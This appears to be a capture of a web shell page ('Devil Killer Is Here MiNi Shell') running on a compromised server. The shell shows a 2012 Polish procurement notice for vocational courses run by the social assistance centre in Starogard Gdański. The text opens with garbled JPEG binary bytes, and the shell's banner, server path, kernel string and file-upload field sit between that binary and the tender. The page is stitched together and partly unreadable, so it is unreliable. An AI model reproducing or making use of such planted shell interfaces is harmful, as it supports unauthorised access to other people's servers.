JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120821/307486-N-2012.html

<p class="kh_header"><b>Starogard Gdański: przeprowadzenie kursów i szkoleń zawodowych dla 67 uczestników projektu systemowego pn. Alpiniści - podniesienie motywacji do poprawy sytuacji życiowej osób bezrobotnych, klientów MOPS Starogard Gdański - edycja 2012-2013, współfinansowanego przez Unię Europejską z Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 307486 - 2012; data zamieszczenia: 21.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , al. Jana Pawła II 6, 83-200 Starogard Gdański, woj. pomorskie, tel. 058 5624458, faks 058 5634014.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.starogard.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przeprowadzenie kursów i szkoleń zawodowych dla 67 uczestników projektu systemowego pn. Alpiniści - podniesienie motywacji do poprawy sytuacji życiowej osób bezrobotnych, klientów MOPS Starogard Gdański - edycja 2012-2013, współfinansowanego przez Unię Europejską z Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest usługa polegająca na organizacji i przeprowadzeniu kursów zawodowych i szkoleń  dla grupy 67 osób, uczestników  projektu systemowego pn. Alpiniści - podniesienie motywacji do poprawy sytuacji życiowej osób bezrobotnych, klientów MOPS Starogard Gdański współfinansowanego przez Unię Europejską z Europejskiego Funduszu Społecznego w zakresie:
1. Kurs profesjonalna pomoc domowa i hotelowa dla 13 osób, min 90 godz. os.
2. Kurs operator wózków jezdniowych z obsługą - wymianą butli gazowej + program magazynowo handlowy dla  5 osób, min. 180 godz. os.
3. Kurs pielęgnacja terenów zielonych dla 6 osób, min. 140 godz. os.
4. Kurs kafelkarz - glazurnik  dla 5 osób, min. 140 godz. os.  
5. Kurs profesjonalny sprzedawca z obsługą kas fiskalnych (fakturowanie) dla 16 osób, min. 180 godz. os.
6. Kurs podstawy obsługi komputera dla 4 osób min. 80 godz. os.
7. Kurs pomoc kuchenna dla 9 osób min. 150 godz. os.
8. Kurs opiekunka dziecięca dla 3 osób, min. 90 godz. os. 
9. Kurs fryzjerstwa dla 3 osób, min 250 godz. os.
10. Kurs opiekun osób starszych i niepełnosprawnych dla 3 osób, 90 godz. os.
Wśród osób skierowanych na kursy są osoby z niepełnosprawnością intelektualną.
Szczegółowy opis przedmiotu zamówienia
Wspólny obszar dotyczący każdego kursu, szkolenia
1. Czas i intensywność szkolenia
a. Ilość godzin zegarowych zajęć dziennie - maksymalnie 7.
b. Godzina zegarowa kursu liczy 60 min. i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą 15 minut przy czym częstotliwość przerw może być ustalana elastycznie.
c. Wymaga się, aby zajęcia szkolenia odbywały się w godzinach od 8.00 do 15.00 od poniedziałku do piątku z wyłączeniem świąt oraz dni ustawowo wolnych od pracy, a także  31 października i  2 listopada.
2. Miejsce realizacji zamówienia
Wymaga się, aby:
a. miejsca w których odbywać się będą szkolenia odpowiadały warunkom określonym w rozporządzeniu MPiPS z dnia 26 września 1997 r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (Dz. U. z 2003r. Nr 169, poz. 1650 ze zm.) w zakresie powierzchni, przestrzeni, oświetlenia i innych,
b. uczestnicy powinni mieć zapewniony bezpłatny dostęp do strzeżonej szatni, jeśli w budynku nie ma szatni organizator szkolenia powinien zapewnić do tego celu inne pomieszczenie, bezpieczne dla pozostawionych okryć wierzchnich, 
c. pomieszczenia sanitarnohigieniczne:
- uczestnicy szkolenia  mieli bezpłatny dostęp do toalet z bieżącą ciepłą wodą do mycia rąk,
- organizator szkolenia  zapewnił oddzielne toalety dla kobiet i mężczyzn, 
- toalety były zlokalizowane w tym samym budynku w którym odbywać się będą szkolenia oraz wyposażone w papier toaletowy, ręczniki papierowe, mydło i uzupełniane na bieżąco,
- stan czystości toalet był monitorowany i sprzątany zgodnie z zapotrzebowaniem i sytuacją.
d. miejscem realizacji szkolenia było miasto Starogard Gdański,
e. do miejsca prowadzenia szkoleń była możliwość dojazdu komunikacją publiczną MZK,
f. wykonawca wskazał dokładny adres miejsca realizacji szkoleń.
3. Materiały dydaktyczne, biurowe i catering dla uczestników
a. Każdy uczestnik musi być wyposażony na pierwszych zajęciach w program i harmonogram szkolenia oraz bezzwrotne materiały dydaktyczne w formie drukowanej np. skrypty z zakresów tematycznych zawartych w programie szkolenia, materiały biurowe teczka lub segregator, notatnik A4, długopis.
b. Przed rozpoczęciem każdego ze szkoleń wykonawca jest zobowiązany do:
- informowania uczestników szkolenia o obowiązujących przepisach, dotyczących bloków tematycznych z powyższego szkolenia, na dzień realizacji szkolenia,
c. Uczestnikom szkolenia, w każdym dniu odbywania zajęć należy zapewnić catering, w skład którego ma wejść: 
- posiłek obiadowy tzn. posiłek jednodaniowy, mięsny pełnowartościowy pod względem odżywczym, różnorodny, zgodny z zasadami żywienia. Zamawiający dopuszcza raz w tygodniu przygotowanie posiłku bez mięsa, np.: naleśniki z serem. Każdy z posiłków musi zawierać minimum 1000 kalorii. Temperatura wydawanych posiłków powinna być zgodna z normami żywieniowymi. W przypadku posiłków dostarczanych do miejsca szkolenia powinny być one podzielone na porcje, dostarczone w zamykanych opakowaniach jednorazowego użytku, zabezpieczone przed nadmierną utratą ciepła, w sposób umożliwiający bezpośrednie podanie do spożycia wraz ze sztućcami jednorazowego użytku. Zarówno opakowania, jak i sztućce muszą być dopuszczone do kontaktu z żywnością,  
- kawa, herbata oraz co najmniej ? litra woda mineralna na osobę dziennie, 
- ciastka kruche lub sztukowe różnego rodzaju.
d. Wykonawca przez cały okres realizacji umowy będzie prowadził rejestr wydanych materiałów szkoleniowych, listy obecności oraz listy wydanych posiłków. Wykonawca przekaże Zamawiającemu 1 komplet materiałów szkoleniowych.
4. Zakres szkolenia
a. Szkolenie powinno obejmować część teoretyczną i praktyczną z wykorzystaniem standardów kwalifikacji zawodowych i modułowych programów szkoleń zawodowych dostępnych w bazach danych prowadzonych przez Ministra Pracy i Polityki Społecznej z danego zakresu (www.standardyiszkolenia.praca.gov.pl),
b. Szkolenie musi być zrealizowane zgodnie z właściwymi przepisami, w szczególności zgodnie z rozporządzeniem MPiPS z dnia 26 września 1997 r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (Dz.U. z 2003r. Nr 169, poz. 1650 z późn. zm.), z uwzględnieniem wyposażenia uczestników kursu w odzież ochronną
c. Szkolenie musi być przeprowadzone zgodnie z programem szkolenia sporządzonym wg wzoru (załącznik nr 5 do SIWZ) oraz zapisami wskazanymi w niniejszych szczegółowych opisach przedmiotu zamówienia.
5. Finansowanie i logo
a. Realizacja szkoleń odbywać się będzie w ramach projektu systemowego pn. Alpiniści - podniesienie motywacji do poprawy sytuacji życiowej osób bezrobotnych, klientów MOPS Starogard Gdański - edycja 2012-2013, współfinansowanego przez Unię Europejską z Europejskiego Funduszu Społecznego.  Każde szkolenie zakończy się wystawieniem przez Wykonawcę dodatkowych zaświadczeń potwierdzających uczestnictwo w szkoleniu w ramach ww projektu EFS. Zaświadczenia te podpisują Zamawiający i Wykonawca.
b. Budynek i sale szkoleniowe, w których przeprowadzane będą szkolenia, muszą być oznakowane informacją o nazwie szkolenia, czasie trwania kursu, numerze sali, w której odbywają się zajęcia. Dodatkowo informacje te muszą być opatrzone logo EFS, PO KL oraz zapisem:  Projekt  pn Alpiniści - podniesienie motywacji do poprawy sytuacji życiowej osób bezrobotnych, klientów MOPS Starogard Gdański - edycja 2012-2013, współfinansowany jest przez Unię Europejską w ramach środków Europejskiego Funduszu Społecznego. Materiały biurowe powinny być oznaczone logo EFS, PO KL zgodnie z zasadami określonymi w wytycznych dotyczących oznaczenia projektowe w ramach PO KL zamieszczone na stronie internetowej www.efs.gov.pl.
6. Ubezpieczenie
Ubezpieczenie dla uczestników kurs na czas jego trwania od następstw nieszczęśliwych wypadków. Ubezpieczenie ma obejmować wypadki powstałe w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem. Wysokość składki ma odpowiadać sumie ubezpieczenia NNW nie mniejszej niż 2000,00 zł na jednego uczestnika szkolenia. Koszty ubezpieczenia ponosi Wykonawca.
Zakres szczegółowy dotyczący poszczególnych kursów
Kurs: profesjonalna pomoc domowa i hotelowa
1. Liczba osób do przeszkolenia: 13
2. Forma organizacji szkolenia: kurs
3. Minimalna ilość godzin przypadająca na jedną osobę -  90
4. Celem szkolenia jest zdobycie przez uczestników wiedzy i uprawnień niezbędnych do świadczenia usługi w zakresie: profesjonalna pomoc domowa i hotelowa
5. Minimalny zakres tematyczny szkolenia musi obejmować następujące zagadnienia:
- zasady sprzątania wg nowoczesnych systemów utrzymania czystości,
- zasady organizacji służb sprzątających,
- sprzęt sprzątający,
- środki chemiczne i dezynfekcyjne wykorzystywane w wewnątrz pomieszczeń i na zewnątrz pomieszczeń,
- techniki sprzątania,
- zajęcia praktyczne,

Kurs:  operator wózków jezdniowych z obsługą - wymianą butli gazowej + program magazynowo - handlowy
1. Liczba osób do przeszkolenia: 5 
2. Forma organizacji szkolenia: kurs.
3. Minimalna ilość godzin przypadająca na jedną osobę -  180
4. Celem szkolenia jest uzyskanie uprawnień operatora wózków jezdniowych  -  z obsługą i wymianą butli gazowej oraz zdobycie umiejętności obsługi programów magazynowo - handlowych
5. Minimalny zakres tematyczny szkolenia musi obejmować następujące zagadnienia: 
- typy stosowanych wózków jezdniowych, budowa wózka, 
- czynności operatora przy obsłudze wózków przed podjęciem pracy i po pracy wózkami,
- czynności operatora w czasie pracy wózkami, 
- wiadomości z zakresu ładunkoznawstwa, 
- budowa i eksploatacja butli gazowej, 
- właściwości gazu propan - butan, aparatura kontrolno - pomiarowa, 
- wiadomości z zakresu bhp, 
- programy magazynowo - handlowe
- gospodarka magazynowa, kartoteki ilościowe i ilościowo-wartościowe, dokumentacja magazynowa (PZ, WZ), wycena rozchodu materiałów w ewidencji, zapasy magazynowe, 
- zajęcia praktyczne.

Kurs: pielęgnacja terenów zielonych
1. Liczba osób do przeszkolenia: 6
2. Forma organizacji szkolenia: kurs
3. Minimalna ilość godzin przypadająca na jedną osobę -  140
4. Celem szkolenia jest zdobycie przez uczestników wiedzy i uprawnień niezbędnych do świadczenia usługi w zakresie: pielęgnacji terenów zielonych
5. Minimalny zakres tematyczny szkolenia musi obejmować następujące zagadnienia:
- przepisy BHP w miejscu pracy,
- charakterystyka i elementy terenów zielonych,
- kształtowanie powierzchni terenu,
- rozpoznawanie,  gatunki  i  cechy  roślin  ozdobnych  i  innych wykorzystywanych w ogrodach i w terenach zielonych,
- zakładanie trawników,
- sposoby nawadniania i nawożenia roślin ogrodniczych,
- pielęgnacja trawników, kwietników, roślin iglastych oraz prace porządkowe,
- maszyny  i  urządzenia  wykorzystywane  w  pielęgnacji  ogrodów i ich konserwacja,
- harmonogram  prac ogrodniczych  wg kalendarza fenologicznego,
- charakterystyka gleby, kryteria wyboru nawozów  i terminy ich stosowania,
- ochrona roślin przed czynnikami szkodliwymi,
- rozpoznawanie i zwalczanie chorób roślin i krzewów, 
- przygotowanie   ogrodów,   trawników,   drzewek   do okresu wegetacyjnego,
- zajęcia praktyczne

Kurs: kafelkarz - glazurnik
1. Liczba osób do przeszkolenia: 5
2. Forma organizacji szkolenia: kurs.
3. Minimalna ilość godzin przypadająca na jedną osobę -  140
4. Celem szkolenia jest zdobycie przez uczestników wiedzy i uprawnień niezbędnych do świadczenia usług w zakresie: kafelkarz - glazurnik   
5. Minimalny zakres tematyczny szkolenia musi obejmować następujące zagadnienia:
- posługiwanie się dokumentacją techniczną,  wykonywanie rysunków roboczych i drobnych aranżacji, 
- organizowanie miejsca pracy i dróg transportowych materiałów, 
- wykonywanie podkładów pod różne rodzaje posadzek oraz izolacji akustycznych i przeciwwodnych podłóg, 
- przygotowanie zapraw cementowych, klejów, kitów, lepików, mas plastycznych, itp. sposobem ręcznym i mechanicznym, 
- dobieranie, sortowanie i obróbka wstępna materiałów podłogowych i posadzkowych, 
- układanie posadzek z różnych materiałów zgodnie z przyjętą technologią i warunkami technicznymi wykonania robót, 
- układanie i mocowanie elementów wykończeniowych posadzek, wykańczanie i konserwacja nawierzchni podłogi, naprawianie i konserwowanie istniejących posadzek z różnych materiałów, 
- dobieranie sprzętu, maszyn i narzędzi zgodnie z zasadami ergonomii, bezpieczeństwa i higieny pracy oraz przepisami przeciwpożarowymi, warunkami technicznymi oraz zasadami racjonalnej gospodarki materiałami i ochrony środowiska,
- przygotowanie lica ścian (podłoża) pod ułożenie glazury, 
- zaplanowanie okładziny, sortowanie i rozmieszczenie, dobór elementów wykończeniowych i ozdobnych, 
- obróbka płytek,  przycinanie, szlifowanie, wykonanie otworów, 
- przyklejanie płytek na zaprawie cementowej i klejowej, - spoinowanie, - licowanie cokołów, schodów, podokienników, słupów, itp. płytkami i kształtkami ceramicznymi lub klinkierowymi, 
- naprawianie okładzin ściennych z różnych rodzajów płytek i na różnych podłożach. 
- zajęcia praktyczne

Kurs: profesjonalny sprzedawca z obsługą kas fiskalnych (fakturowanie) 
1. Liczba osób do przeszkolenia: 16 
2. Forma organizacji szkolenia: kurs
3. Minimalna ilość godzin przypadająca na jedną osobę -  180
4. Celem szkolenia jest zdobycie przez uczestników wiedzy i uprawnień niezbędnych do świadczenia usługi w zakresie: sprzedawca z obsługą kas fiskalnych (fakturowaniem)
5. Minimalny zakres tematyczny szkolenia musi obejmować następujące zagadnienia:
- prawne aspekty sprzedaży, prawa i obowiązki sprzedawcy, gwarancję, reklamacje, faktury, paragony, korekty , odpowiedzialność za błędy, 
- fakturowanie sprzedaży, 
- obsługa klienta, techniki sprzedaży, zasady profesjonalnej obsługi klienta , typologia klientów, komunikacja werbalna i niewerbalna - rola i znaczenie, 
- skuteczne techniki negocjacji, etapy i struktura procesu sprzedaży, racjonalne i emocjonalne motywacje zakupu, 
- obsługa kas fiskalnych, 
- przedstawienie podstawowych kwestii prawnych - ustawa o VAT,  obowiązki podatnika, obowiązki serwisu, sankcje karne, 
- rodzaje urządzeń fiskalnych oraz zasady ich wyboru, 
- sprzedaż z użyciem kas fiskalnych, sprzedaż towarów jednostkowych, sprzedaż wielokrotna i ułamkowa towarów, obsługa opakowań zwrotnych, 
- finalizacja transakcji różnymi formami zapłaty, udzielanie rabatów procentowych i kwotowych, korekta błędów, funkcje pozafiskalne, 
- organizacja zaopatrzenia i przyjmowania towarów, 
- raporty fiskalne i kontrolne, wzajemne zależności logiczne raportów, sytuacje awaryjne oraz sposoby ich likwidacji, wymiana materiałów eksploatacyjnych, zasady instalacji kas na stanowisku, zasady archiwizacji dokumentów księgowych 
-terminy archiwizacji rolek sprawozdawczych oraz raportów dziennych i okresowych, obieg dokumentacji KW i KP, wpłaty i wypłaty, zaliczki z kasy, przelewy bankowe, raport kasowy  
6. Minimum jedna kasa fiskalna na dwie osoby.

Kurs:  podstawy obsługi komputera
1. Liczba osób do przeszkolenia: 4
2. Forma organizacji szkolenia: kurs
3. Minimalna ilość godzin przypadająca na jedną osobę -  80
4 Celem szkolenia jest zdobycie przez uczestników wiedzy z podstaw obsługi komputera
5 Minimalny zakres tematyczny szkolenia musi obejmować następujące zagadnienia:
- podstawowe zagadnienia dotyczące budowy i działania komputera,
- możliwości podłączania urządzeń zewnętrznych (monitor, mysz, klawiatura, drukarka) 
- budowa sieci komputerowej, a w szczególności w jaki sposób odnaleźć komputery w sieci oraz w jaki sposób udostępniać dane innym jej użytkownikom, 
- zasady organizacji danych przechowywanych na dyskach komputera: podział dysku na partycje, pliki i katalogi - ich rodzaje, budowa, przeznaczenie i lokalizacja na dyskach.
- przedstawienie podstawowych funkcji programu Microsoft Word ( jak stworzyć estetyczne pismo, jak wzbogacić przygotowywany dokument o grafikę i wykresy, jak ponumerować strony i załączyć spis treści oraz jak stworzyć korespondencję seryjną).
- przedstawienie podstawowych funkcji programu Microsoft Excel w zakresie wykonywania różnorakich obliczeń, budowania zestawień, tworzenia wykresów w oparciu o zgromadzone dane oraz jak gromadzić i organizować dane w arkuszu kalkulacyjnym, tak aby były one czytelne i gotowe do dalszego przetwarzania,
- Internet i poczta elektroniczna, podstawowe korzyści jakie daje nam dostęp do Internetu; w szczególności możliwość przeglądania stron WWW, wymiany plików oraz korzystanie z poczty elektronicznej, obsługa wyszukiwarki, jak założyć konto poczty elektronicznej na darmowym serwerze pocztowym oraz jak skonfigurować program pocztowy, w którym łatwo i wygodnie będzie można tego konta używać, przeglądu oprogramowania antywirusowego oraz firewalli.
- multimedia; jak kopiować pliki muzyczne do odtwarzacza MP3, jak nagrać płytę CD/DVD oraz co jest potrzebne do odtwarzania filmów i muzyki na komputerze. 

Kurs: pomoc kuchenna
1. Liczba osób do przeszkolenia: 9
2. Forma organizacji szkolenia: kurs
3. Minimalna ilość godzin przypadająca na jedną osobę -  150
4. Celem szkolenia jest zdobycie przez uczestników wiedzy i uprawnień niezbędnych do świadczenia usługi w zakresie: pomoc kuchenna
5. Minimalny zakres tematyczny szkolenia musi obejmować następujące zagadnienia:
- samodzielnie sporządzanie różnego rodzaju potraw z surowców i półproduktów spożywczych zgodnie z odpowiednimi recepturami oraz techniką sporządzania,
- umiejętne korzystanie z nowoczesnych maszyn, urządzeń i sprzętów stosowanych w technologii gastronomicznej zgodnie z przepisami bhp i ppoż.,
- umiejętne gospodarowanie surowcami, półproduktami i wyrobami gotowymi,
-  przechowywanie, magazynowanie artykułów spożywczych, surowców, półproduktów,
- posługiwanie się różnymi technikami i metodami obróbki kulinarnej,
- porcjowanie, wykańczanie i dekorowanie potrawy z uwzględnieniem aktualnych trendów,
- kalkulowanie ceny oraz oferty kulinarnej,
- utrzymywanie porządku i czystość na stanowisku pracy, przestrzegając zasady higieny pracy,
- dobieranie surowców i półproduktów do produkcji,
- sporządzanie różnymi technikami i metodami podstawowego asortymentu potraw i napojów,  
- ocenianie jakościowe i ilościowe surowców, półproduktów i wyrobów gotowych,
- zajęcia praktyczne.

Kurs: opiekunka dziecięca
1. Liczba osób do przeszkolenia: 3 
2. Forma organizacji szkolenia: kurs
3 Minimalna ilość godzin przypadająca na jedną osobę -  90
4 Celem szkolenia jest zdobycie przez uczestników wiedzy i uprawnień niezbędnych do świadczenia usługi w zakresie: opiekunka dziecięca
5 Minimalny zakres tematyczny szkolenia musi obejmować następujące zagadnienia:
- regulamin  i  obowiązki  opiekunki  dziecięcej  oraz  specyfika zawodu,
- stosowanie  wybranych  form  komunikacji  interpersonalnej  oraz metod poznawania dziecka,
- określanie potrzeb dziecka i sposobów ich zaspakajania,
- stosowanie podstawowych zasad i metod wychowania,
- wychowanie dziecka w środowisku instytucjonalnym,
- stosowanie  wybranych  gier  i  zabaw  wpływających  na  rozwój dziecka,
- utrzymywanie w czystości skóry dziecka i jego otoczenia,
- zaspokajanie podstawowych potrzeb fizjologicznych dziecka,
- podstawy udzielania pierwszej pomocy u dzieci.

Kurs: fryzjerstwo
1. Liczba osób do przeszkolenia: 3
2. Forma organizacji szkolenia: kurs
3. Minimalna ilość godzin przypadająca na jedną osobę -  250.
4. Celem szkolenia jest zdobycie przez uczestników wiedzy i uprawnień niezbędnych do świadczenia usługi w zakresie: fryzjerstwa.
5. Minimalny zakres tematyczny szkolenia musi obejmować następujące zagadnienia: 
- zasady BHP w pracy fryzjera, 
- omówienie produktów do stylizacji i modelowania włosów,
- budowa włosów, skóry i właściwości (typy i funkcja skóry, rozpoznawanie chorób skóry, budowa włosów, ich funkcja i rodzaje, właściwości włosów, uszkodzenia i sposoby regeneracji struktury włosa, pielęgnacja),
- dopasowanie fryzury do kształtu twarzy,
- pielęgnacja włosów, 
- strzyżenie damskie i męskie, czesanie, pasemka, balayage, refleksy, papiloty, loki, skręcanie włosów na wałki,
- stylizacja włosów przy użyciu lokówki i prostownicy,
- farbowanie i trwała ondulacja,
- zajęcia praktyczne

Kurs: opiekun osób starszych i niepełnosprawnych
1. Liczba osób do przeszkolenia: 3
2. Forma organizacji szkolenia: kurs
3. Minimalna ilość godzin przypadająca na jedną osobę -  90
4. Celem szkolenia jest zdobycie przez uczestników wiedzy i uprawnień niezbędnych do świadczenia usługi w zakresie: opiekun osób starszych i niepełnosprawnych
5. Minimalny zakres tematyczny szkolenia musi obejmować następujące zagadnienia 
- podstawy  higieny  i  pielęgnacji,  
- podstawy rehabilitacji, 
- bezpieczeństwo i higiena pracy,
- wykonywanie codziennych czynności z zakresu gospodarstwa domowego, 
- wykonywanie czynności higienicznych przy podopiecznym,
- wspieranie biologicznych funkcji życiowych podopiecznego,
- organizowanie czasu podopiecznemu i dotrzymywanie towarzystwa, 
- udzielanie pierwszej pomocy przedlekarskiej, 
- zajęcia praktyczne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.31.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca przedstawi oświadczenie, że posiada uprawnienia do wykonywania działalności i czynności będących przedmiotem zamówienia (wzór - zał. nr 6 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przeprowadził minimum po jednym szkoleniu z każdego kursu objętego przedmiotem zamówienia:
1.	Kurs profesjonalna pomoc domowa i hotelowa,
2.	Kurs operator wózków jezdniowych z obsługą - wymianą butli gazowej + program magazynowo handlowy,
3.	Kurs pielęgnacja terenów zielonych,
4.	Kurs kafelkarz - glazurnik,
5.	Kurs profesjonalny sprzedawca z obsługą kas fiskalnych (fakturowanie),
6.	Kurs podstawy obsługi komputera,
7.	Kurs pomoc kuchenna,
8.	Kurs opiekunka dziecięca, 
9.	Kurs fryzjerstwa,
10.	Kurs opiekun osób starszych i niepełnosprawnych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
